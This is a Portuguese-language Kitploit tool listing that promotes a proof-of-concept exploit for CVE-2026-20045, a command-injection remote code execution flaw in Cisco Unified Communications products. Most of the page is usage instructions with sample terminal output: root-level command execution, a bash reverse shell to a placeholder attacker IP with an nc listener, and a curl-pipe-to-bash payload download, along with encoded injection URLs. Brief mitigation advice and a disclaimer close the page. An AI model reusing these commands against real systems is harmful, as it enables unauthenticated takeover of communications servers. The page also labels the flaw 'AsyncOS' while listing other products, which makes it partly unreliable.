Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

Prova de conceito de exploit para CVE-2026-20045, uma RCE crítica não autenticada em produtos Cisco Unified Communications, permitindo injeção de comandos e reverse shell com escalonamento para root.

Ver Repositório
63há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-20045 — Análise de Zero-Day 🚨

Vulnerabilidade Cisco AsyncOS 0-Day

🧨 O que é

Uma vulnerabilidade crítica de execução remota de código (RCE) que afeta vários produtos Cisco Unified Communications. Foi explorada ativamente no mundo real antes do lançamento dos patches.


🔥 Por que é perigosa

  • 🚫 Nenhuma autenticação necessária
  • 🖥️ Execução remota de código
  • 👑 Possível acesso de nível root
  • 🌍 Exploração confirmada no mundo real

Isso significa que um atacante poderia assumir totalmente o controle de sistemas afetados remotamente.


🚨 Exemplos de Uso para CVE-2026-20045.py

Aqui está um guia refinado com exemplos de uso para executar o script PoC, incluindo exatamente o que você veria no seu terminal se a exploração for bem-sucedida em um alvo Cisco Unified Communications vulnerável (interface web sem patch exposta). Adicionei alguns elementos estéticos com emojis, blocos de código coloridos (via markdown) e seções estruturadas para melhor legibilidade. 😎

1. Teste Básico de Informações do Sistema

Isso executa comandos simples para obter o ID do usuário, nome de usuário e detalhes do sistema.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

O Que Você Veria Se Funcionar (Saída Bem-Sucedida):

root@kitploit:~
[*] Enviando injeção do Estágio 1 para: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Comando inicial: id && whoami && uname -a  
[+] Estágio 1 provavelmente bem-sucedido! Status: 200  
[*] Enviando escalonamento do Estágio 2 para: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Estágio 2 (escalonamento root) provavelmente bem-sucedido! Status: 200  

[+] Possível saída do comando:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 Sinais-Chave: Indicadores verdes [+], status HTTP 200 e resultados de comando no bloco de saída. Se nenhuma saída aparecer, mas o status for 200, ainda funcionou silenciosamente!

2. Configuração de Reverse Shell

Isso gera um shell interativo de volta para sua máquina. Primeiro, inicie um listener: nc -lvnp 4444.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

O Que Você Veria Se Funcionar (No Terminal do Script):

root@kitploit:~
[*] Enviando injeção do Estágio 1 para: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Comando inicial: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Estágio 1 provavelmente bem-sucedido! Status: 200  
[*] Enviando escalonamento do Estágio 2 para: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Estágio 2 (escalonamento root) provavelmente bem-sucedido! Status: 200  
[+] Comando executado silenciosamente (verifique os efeitos no alvo)  

O Que Você Veria no Terminal do Listener (nc):

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 Sinais-Chave: O script mostra mensagens de sucesso; o listener recebe um prompt de shell root imediato. Digite comandos lá para interagir!

3. Download e Execução de Arquivo (ex.: Payload Personalizado)

Isso baixa e executa um script do seu servidor.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

O Que Você Veria Se Funcionar (Saída Bem-Sucedida):

root@kitploit:~
[*] Enviando injeção do Estágio 1 para: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Comando inicial: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Estágio 1 provavelmente bem-sucedido! Status: 200  
[*] Enviando escalonamento do Estágio 2 para: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Estágio 2 (escalonamento root) provavelmente bem-sucedido! Status: 200  
[+] Comando executado silenciosamente (verifique os efeitos no alvo)  

📥 Sinais-Chave: Códigos de status 200; verifique no alvo (ex.: logs/arquivos) ou no seu servidor (logs de download). Sem saída direta se o payload for silencioso.

💡 Dicas Profissionais:

  • Execute com sudo se necessário para privilégios de rede.
  • Use alvos HTTPS; o script lida com certificados autoassinados.
  • Se falhar (ex.: 404/403), tente outros caminhos ou verifique se o alvo está corrigido.
  • Sempre teste eticamente! 😈

🧩 Produtos Afetados

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 Causa Raiz

Validação inadequada de entrada fornecida pelo usuário em interfaces de gerenciamento HTTP, permitindo injeção de comandos que leva à execução remota de código.


📊 Gravidade

  • Pontuação CVSS: 8.2 (Alta)
  • Impacto nos Negócios: Crítico

🛡️ Mitigação e Defesa

  • ⚡ Aplique os patches da Cisco imediatamente
  • 🔒 Restrinja o acesso às interfaces de gerenciamento
  • 🌐 Evite expor sistemas diretamente à internet
  • 👀 Monitore logs para atividade HTTP suspeita
  • 🏛️ Siga as diretrizes governamentais de remediação de vulnerabilidades, se aplicável

🔒 Aviso Legal:

Todo o código PoC é para uso ético e educacional apenas em sistemas autorizados. Exploração não autorizada é ilegal; nenhuma responsabilidade é assumida por uso indevido. 😈

Baixar ferramenta